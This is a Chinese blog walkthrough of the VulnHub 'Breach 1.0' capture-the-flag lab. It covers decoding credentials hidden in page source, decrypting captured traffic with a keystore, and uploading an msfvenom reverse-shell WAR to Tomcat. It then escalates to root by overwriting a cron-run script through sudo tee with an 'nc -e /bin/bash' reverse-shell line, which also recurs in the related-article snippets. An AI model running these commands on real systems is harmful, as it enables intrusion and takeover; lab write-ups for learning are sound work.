vulnhub靶场——BREACH: 1 渗透记录

最新推荐文章于 2023-12-31 01:46:29 发布
最新推荐文章于 2023-12-31 01:46:29 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 渗透 文章标签: 安全 web安全 渗透
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/122812056
版权

BREACH: 1

vulnhub靶场——BREACH: 1 渗透记录


BREACH: 1 :https://www.vulnhub.com/entry/breach-1,152/
下载: https://download.vulnhub.com/breach/Breach-1.0.zip

Description
First in a multi-part series, Breach 1.0 is meant to be beginner to intermediate boot2root/CTF(从启动boot到获取root权限和查看flag) challenge. Solving will take a combination of solid information gathering and persistence. Leave no stone unturned.
Virtual Machine
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
Networking
DHCP service: Disabled
IP address: 192.168.110.140

我猜这里的BREACH意思是让我们寻找突破口


一、信息搜集

fscan简单扫漏

./f -h 192.168.110.140
# [*] WebTitle:http://192.168.110.140    code:200 len:21     title:Welcome to Breach 1.0

image-20220129154817169

goby扫扫

image-20220129154807841



二、网站渗透

80端口有网站的

image-20220129143359794

查看源码有一堆base64的注释

image-20220129163101018

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
二次解码得到
pgibbons:damnitfeel$goodtobeagang$ta

还有一个跳转,往里翻翻看到有个 impresscms

image-20220129163139750

之前的base64就是用户密码

进去发现邮箱里面有个ssl密钥,192.168.110.140/.keystore

image-20220207140407820

找impresscms的漏洞,发现有sql注入,跨站脚本执行和本地文件包含漏洞,但都是在admin的情况下才可以执行,我们手里的用户不是admin,有的需要content页面但是被替换成一个gif了

点点发现这里也可以进content

1.流量包

image-20220207140909627

Content SSL implementation test capture (2016/6/4 21:37)

有个流量包可以下载

image-20220207141029777

http://192.168.110.140/impresscms/_SSL_test_phase1.pcap

看上面文章的内容知道和tomcat有关,可以用kali内置的keytool来解析之前得到的keystore

keytool基本使用

Keytool 是一个Java 数据证书的管理工具 ,Keytool 将密钥(key)和证书(certificates)存在一个称为keystore的文件中 在keystore里,包含两种数据:
密钥实体(Key entity)——密钥(secret key)又或者是私钥和配对公钥(采用非对称加密)
可信任的证书实体(trusted certificate entries)——只包含公钥

查看keystore内容

keytool -list -keystore [keystore]

根据下面的提示转成PKCS12标准

keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12

image-20220207142850113

不用写端口啥的,直接导入证书,就可以看到http的包了

image-20220207143212745

http流里面有用户密码

image-20220207144509398

dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
tomcat:Tt\5D8F(#!*u=G)4m7zB

2.tomcat

访问时候要注意协议是https,端口8443

image-20220207144347172

登陆进去是tomcat的管理页面,上传war包反弹shell

我用蚁剑菜刀的jsp🐎都连不了,可能是https的原因…所以用msf反弹shell(kali的IP:192.168.110.128)

1)生成war包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.110.128 lport=4444 -f war -o shell.war

image-20220207160005527

2)kali监听

msf6 payload(java/meterpreter/reverse_tcp) > use multi/handler
[*] Using configured payload java/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.110.128
lhost => 192.168.110.128
msf6 exploit(multi/handler) > set rport 4444
rport => 4444
msf6 exploit(multi/handler) > run

访问上传的war,需要等待一段时间

image-20220207160102746

image-20220207160148464



三、提权

上传文件失败,想用ping命令的suid提权也不行
然后看别人的wp发现是passwd得到明文密码,cat /etc/passwd可以看到可登陆的用户有三个:

image-20220207164122901

milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

很神奇,milton的密码是在mysql里面,查看/var/www可以看到php文件,里面mysql是无密码的

image-20220207170609311

查看mysql数据库

mysql -u root -p
Enter password: 
use mysql;
select user,password from user;
exit
然后看到user表里有milton密码
user    password
root
milton  6450d89bd3aff1d893b85d3ad65d2ec2
root
root
debian-sys-maint        *A9523939F1B2F3E72A4306C34F225ACF09590878

milton的密码:thelaststraw

但是milton没有什么东西,blumbergh的密码在http://192.168.110.140/images/bill.png图片里面

image-20220207170848576

blumbergh的密码:coffeestains

su登陆,这里要注意

无法执行su命令,显示需要一个终端,通过Python解决:

image-20220207171230120

python -c 'import pty;pty.spawn("/bin/bash")'

登陆blumbergh后history发现

history
    1  clear
    2  logoff
    3  logout
    4  exit
    5  cd /usr/share/cleanup
    6  cat tidyup.sh
    7  whoami
    …………

tidyup.sh

#!/bin/bash

#Hacker Evasion Script 
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.

cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf

使用 sudo -l 命令列出当前用户可执行的命令(这里我用一些找suid的命令找不到tee,不知道为啥)

image-20220207171333366


反弹root的shell

tidyup.sh能够以root权限运行,所以可以利用其反弹shell

1)先将nc反弹shell命令写入shell.txt文件

echo "nc -e /bin/bash 192.168.110.128 4443" > shell.txt

2)使用tee命令将shell.txt内容输出到tidyup.sh

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

查看tidyup.sh文件写入成功:

cat /usr/share/cleanup/tidyup.sh

image-20220207172231912

等个一会拿到root

image-20220207172635273

image-20220207172656715



参考wp:

靶机实战-Breach-1.0_滕财然的博客

VulnHub渗透测试实战靶场Breach 1.0

shu天
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
一次失败的vulnhub靶机渗透breach1.0
weixin_44255856的博客
08-06 1386
靶机地址下载https://pan.baidu.com/s/1KuwK_8MqCWhcIcNpTJ-OLQ 这是靶机的介绍 在一个由多个部分组成的系列文章中,Breach 1.0是一个初学者到中级boot2root/CTF挑战。解决问题需要扎实的信息收集和坚持不懈的努力。千方百计。 VM配置了一个静态IP地址(192.168.110.140),因此您需要将您的主机专用适配器配置到这个子网。 非常...
Breach-1.0.zip
08-21
Breach-1.0.zip
breach:执行BREACH攻击的工具
04-28
违反 注意:此存储库不再维护。 该项目在得到了发展,因此,如果您对BREACH攻击的研究感兴趣,请确保进行检查。 描述 执行攻击的工具。 脚本 描述 违反 开始攻击的主要脚本。 connect.py 嗅探TLS数据包,对TLS记录进行碎片整理并转储标头和有效负载的MitM代理。 解析 脚本分析网络上嗅探到的长度,并确定应如何继续进行攻击。 爬山 创建evil.js所需参数的脚本。 iolibrary.py 具有用于与用户进行I / O通信的有用功能的库。 嗅探 提供以太网级别(及更高级别)数据包信息的网络嗅探器。 index.html 包含邪恶js的最小HTML页面。 evil.js 解析从hillclimbing.py创建的文件(与evil.js和index.html相同的目录)中所需参数的Javascript,并在端点上发出请求。 配置文件 YAML配置文件。
hull-breach:由Godot 3.0.2制成的2D街机射击游戏,具有水下设置
05-08
2D街机射击游戏,带有水下设置,由Godot 3.0.2制成。
BREACH:在BlackHat 2013上演示了运行BREACH攻击的工具
04-28
这是什么? 该工具具有基本的BREACH攻击功能。 我们正在研究在BlackHat 2013上展示的基于浏览器的原型。 这仅用于自我评估。 不要做坏事。 笔记 MITM:PoC不需要这样做。 相反,我们建议使用一个简单的HOSTS条目来启用对加密流量的测量。 无浏览器:目前,我们提供了一个简单的HTTP客户端,可以模拟浏览器的行为。 功能齐全的基于浏览器的工具将随之而来。 分组密码:该工具还不够智能,无法对抗分组密码。 也许您可以向我们发送拉动请求以解决此问题! 如何使用它 要求: Windows操作系统(已测试7+) .NET 3.5+框架 Visual Studio 2010+(如果要修改代码) 如何运行: 生成项目以获取可执行文件,或从下载它们。 使用admin privs在命令外壳中运行(echo. && echo 127.0.0.1 malbot.net) >>
IDEA2017_导出war教程(绝对可以)
09-19
IDEA2017_导出war教程: 以IntelliJ IDEA 2017.1.1 为教程,包里只有简单的几张图片,通熟易懂,操作简单。
breach靶场练习详细全过程
weixin_73562787的博客
07-18 266
1.这次的靶场打的我比较震惊的,长见识了,真的很明显的感受到信息搜索和分析的力量,有种睿智的推理家的感觉了,特别是到后面推测用户blumbergh与bill微妙的关系,以及最后blumbergh的密码是隐藏在bill的图片里,是需要一大段信息的搜索和条理清晰的分析才能得到的推断的,要有耐心,不放过任何一条线索。
vlunhub系列之breach靶机
hanjinming110的博客
08-11 367
cat shell.txt nc -e /bin/bash 192.168.110.22 5555 将其成功的写入到这个文件中,我们使用/usr/bin/tee目录,将这个文件写入到/usr/share/cleanup/tiduup.sh中。cat /usr/share/cleanup/tidyup.sh nc -e /bin/bash 192.168.110.22 5555 成功的将脚本写入到找个文件中,等待可执行脚本的运行。
kali渗透之综合实战拿下root全过程
m0_56988395的博客
02-25 8736
目录 靶机 攻击机 开局先扫端口 keystore:密钥的储存库 提权 1、根据版本找一下看有没有漏洞 2、sudo -l 3、history 4、利用weatweb来识别一下http用的什么程序 发现数据库用户名为root,密码为空密码,进到mysql看看 登录一下milton 切换blumbergh用户 最后开个新终端进行监听端口 注:以下内容仅供交流学习,请勿用于非法途径 这次渗透涉及的知识点较多,难度稍微复杂些许 靶机 DC-9(需要主机模式
靶场-breach1
qq_45751902的博客
10-18 1109
在下载了keystore文件的目录中打开终端,输入命令:keytool -list -keystore keystore,输入口令tomcat,查看keystore密钥库中的证书。将图片下载后利用图片隐写术, strings分析图片,或者exiftool查看(突然发现,那张bill.png(上面有字的)说的话,我理解错了,需要用隐写术)打开bill.png,上面的字让我们看源码(在后面才知道这句话的真正意思),但是这个上面图片的源码都没有内容,想到刚才80端口还有一个图片,这个源码有内容。
Breach:负责任地用于识别 XSS 漏洞的网络安全工具
08-03
违反 一种用于负责任地识别前端 Web 漏洞的网络安全工具
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
信息安全_数据安全_Assumed Breach:A Better Model for Pene.pdf
08-21
信息安全_数据安全_Assumed Breach:A Better Model for Pene 安全工作 法律法规 安全防护 漏洞分析 数据恢复
sample-war-build:一个简单的应用程序,它将war文件生成为可部署文件
03-05
sample-war-build:一个简单的应用程序,它将war文件生成为可部署文件
Vulnhub靶场渗透练习(一) Breach1.0
深蓝旭的博客
08-24 419
打开靶场 固定ip需要更改虚拟机为仅主机模式192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 解密cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh 得到这个结果可能是二次加密在base64解密 得到pgibbons:damnitfeel$goodtobeagang$ta 去除: 得到两个字符串pgibbons,dam...
Vulnhub靶场Breach1.0
shy的博客
05-19 943
靶机IP地址发现: 1、arp-scan --interface eth1 192.168.110.1/24 2、 nmap -sP 192.168.110.1/24 3、 fping -a -g 192.168.110.1/24 4、linux:for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done windows:for /l %i in (1,1,
VulnHub靶场笔记 - Breach: 2.1(OSCP推荐靶场
最新发布
m0_62652276的博客
12-31 1094
根据此前的提示,我们尝试使用beef-xss工具(密码igfix),我们将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址。sshd_config是客户端的ssh配置文件,查看内容,在配置文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。综合之前的思路,既然peter用户的密码是知道的但无法正常进行ssh登录,我们尝试查找与ssh相关的配置。
vulnhub靶机DC4
weixin_52450702的博客
11-02 578
dc-4靶机ip:192.168.70.163靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip.torrent。
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2304
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
putty WARNING - POTENTIAL SECURITY BREACH!
07-27
回答: 当您在使用PuTTY时,如果看到"WARNING - POTENTIAL SECURITY BREACH!"的警告信息,这可能是由于几种原因引起的。首先,这可能是因为您连接的服务器使用了较低的加密算法,而PuTTY检测到这可能存在安全风险。这是为了防止降级攻击。\[2\]其次,这可能是因为您连接的服务器返回了未分配的公共IP地址,这些地址通常可以被安全地阻止,因为它们不应该处于活动使用状态。\[1\]最后,PuTTY在某些平台上可能会在处理线条绘制字符时出现问题。\[3\]如果您遇到这个警告信息,建议您仔细检查服务器的安全性,并确保使用较高级别的加密算法来保护您的连接。 #### 引用[.reference_title] - *1* *3* [SG-1000使用指南](https://blog.csdn.net/weixin_33991727/article/details/89872893)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [PuTTY用户手册(十四)](https://blog.csdn.net/le_17_4_6/article/details/86522290)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值